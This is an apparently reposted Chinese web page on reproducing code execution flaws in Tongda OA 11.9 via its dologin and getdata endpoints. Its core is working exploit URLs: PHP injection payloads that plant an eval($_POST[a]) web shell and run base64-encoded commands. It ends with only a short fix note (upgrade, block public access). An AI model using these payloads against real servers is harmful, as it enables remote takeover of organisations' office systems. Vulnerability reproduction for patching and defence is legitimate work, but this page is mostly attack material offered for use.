通达 oa 11.9 代码执行漏洞复现

您所在的位置:网站首页 通达oa2022官方网站 通达 oa 11.9 代码执行漏洞复现

通达 oa 11.9 代码执行漏洞复现

2024-07-11 19:48| 来源: 网络整理| 查看: 265

描述

通达OA11.9版本(包含SP7补丁)的dologin方法存在代码执行漏洞,攻击者可以通过漏洞执行任意代码,获取服务器权限,此类代码执行型漏洞影响范围(11.8-11.9sp7)。

通达OA v11.9 getdata接口存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限。

漏洞复现dologin方法

poc

http://xxxx:xx/general/appbuilder/web/portal/gateway/dologin?name[]=%E9%8C%A6%27.print_r(md5(123)),//

1691673377_64d4e321f0cc4c454bba3.png!small?1691673379127

exp

http://x.x.x.x:x/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[a]))%3B/*&id=19&module=Carouselimage

1691673640_64d4e42896d5f2bbff775.png!small?1691673642121

getdata接口

poc

http://xxxx:xx/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22[base64加密的命令]%22)))%3B/*&id=19&module=Carouselimage

1691673264_64d4e2b0ecf075a38f73c.png!small?1691673265450

exp

http://xxxx:xx/general/appbuilder/web/portal/gateway/dologin?name%5B%5D=%E9%8C%A6%27.eval($_POST[a]),//

1691673807_64d4e4cfa2a586f37fbff.png!small?1691673808615

解决方案

升级至11.x或者12.x最新版:https://www.tongda2000.com/

如非必要,禁止公网访问该系统。



【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3